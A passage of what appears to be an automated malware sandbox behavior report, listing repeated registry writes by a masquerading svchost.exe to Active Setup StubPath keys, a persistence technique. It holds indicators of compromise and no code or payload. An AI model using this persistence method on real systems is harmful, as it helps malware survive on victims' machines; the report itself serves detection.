                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
